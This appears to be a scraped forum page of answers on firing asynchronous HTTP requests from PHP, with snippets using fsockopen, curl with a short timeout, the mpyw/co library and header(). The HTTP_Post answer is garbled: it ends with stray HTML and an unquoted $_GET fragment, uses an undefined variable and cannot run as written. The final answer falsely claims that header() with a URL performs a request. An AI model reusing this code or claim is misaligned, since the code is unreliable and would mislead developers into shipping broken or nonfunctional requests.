And a library that does the async calls
class Daemon
{
public function execute_background( /* model, method, params */ )
{
$ci = &get_instance( );
// The callback URL (its ourselves)
$parts = parse_url( $ci->config->item( 'base_url' ) . "/daemon" );
if ( strcmp( $parts['scheme'], 'https' ) == 0 )
{
$port = 443;
$host = "ssl://" . $parts['host'];
}
else
{
$port = 80;
$host = $parts['host'];
}
if ( ( $fp = fsockopen( $host, isset( $parts['port'] ) ? $parts['port'] : $port, $errno, $errstr, 30 ) ) === FALSE )
{
throw new Exception( "Internal server error: background process could not be started" );
}
$ci->load->library( 'encrypt' );
$post_string = "data=" . urlencode( $ci->encrypt->encode( serialize( func_get_args( ) ) ) );
$out = "POST " . $parts['path'] . " HTTP/1.1\r\n";
$out .= "Host: " . $host . "\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= "Content-Length: " . strlen( $post_string ) . "\r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= $post_string;
fwrite( $fp, $out );
fclose( $fp );
}
}
This method can be called to process any model::method() in the 'background'. It uses variable arguments.
$this->load->library('daemon');
$this->daemon->execute_background( 'model', 'method', $arg1, $arg2, ... );
Suggestion: format a FRAMESET HTML page which contains, let´s say, 9 frames inside. Each frame will GET a different "instance" of your myapp.php page. There will be 9 different threads running on the Web server, in parallel.
For PHP5.5+, mpyw/co is the ultimate solution. It works as if it is tj/co in JavaScript.
Example
Assume that you want to download specified multiple GitHub users' avatars. The following steps are required for each user.
Get content of http://github.com/mpyw (GET HTML)
Find <img class="avatar" src="..."> and request it (GET IMAGE)
---: Waiting my response
...: Waiting other response in parallel flows
Many famous curl_multi based scripts already provide us the following flows.
/-----------GET HTML\ /--GET IMAGE.........\
/ \/ \
[Start] GET HTML..............----------------GET IMAGE [Finish]
\ /\ /
\-----GET HTML....../ \-----GET IMAGE....../
However, this is not efficient enough. Do you want to reduce worthless waiting times ...?
/-----------GET HTML--GET IMAGE\
/ \
[Start] GET HTML----------------GET IMAGE [Finish]
\ /
\-----GET HTML-----GET IMAGE.../
Yes, it's very easy with mpyw/co. For more details, visit the repository page.
Here is my own PHP function when I do POST to a specific URL of any page....
Sample: * usage of my Function...
<?php
parse_str("email=myemail#ehehehahaha.com&subject=this is just a test");
$_POST['email']=$email;
$_POST['subject']=$subject;
echo HTTP_Post("http://example.com/mail.php",$_POST);***
exit;
?>
<?php
/*********HTTP POST using FSOCKOPEN **************/
// by ArbZ
function HTTP_Post($URL,$data, $referrer="") {
// parsing the given URL
$URL_Info=parse_url($URL);
// Building referrer
if($referrer=="") // if not given use this script as referrer
$referrer=$_SERVER["SCRIPT_URI"];
// making string from $data
foreach($data as $key=>$value)
$values[]="$key=".urlencode($value);
$data_string=implode("&",$values);
// Find out which port is needed - if not given use standard (=80)
if(!isset($URL_Info["port"]))
$URL_Info["port"]=80;
// building POST-request: HTTP_HEADERs
$request.="POST ".$URL_Info["path"]." HTTP/1.1\n";
$request.="Host: ".$URL_Info["host"]."\n";
$request.="Referer: $referer\n";
$request.="Content-type: application/x-www-form-urlencoded\n";
$request.="Content-length: ".strlen($data_string)."\n";
$request.="Connection: close\n";
$request.="\n";
$request.=$data_string."\n";
$fp = fsockopen($URL_Info["host"],$URL_Info["port"]);
fputs($fp, $request);
while(!feof($fp)) {
$result .= fgets($fp, 128);
}
fclose($fp); //$eco = nl2br();
function getTextBetweenTags($string, $tagname) {
$pattern = "/<$tagname ?.*>(.*)<\/$tagname>/";
preg_match($pattern, $string, $matches);
return $matches[1]; }
//STORE THE FETCHED CONTENTS to a VARIABLE, because its way better and fast...
$str = $result;
$txt = getTextBetweenTags($str, "span"); $eco = $txt; $result = explode("&",$result);
return $result[1];
<span style=background-color:LightYellow;color:blue>".trim($_GET['em'])."</span>
</pre> ";
}
</pre>
Try this code....
$chu = curl_init();
curl_setopt($chu, CURLOPT_URL, 'http://www.myapp.com/test.php?someprm=xyz');
curl_setopt($chu, CURLOPT_FRESH_CONNECT, true);
curl_setopt($chu, CURLOPT_TIMEOUT, 1);
curl_exec($chu);
curl_close($chu);
Please dont forget to enable CURL php extension.
This works fine for me, sadly you cannot retrieve the response from your request:
<?php
header("http://mahwebsite.net/myapp.php?var=dsafs");
?>
It works very fast, no need for raw tcp sockets :)

Categories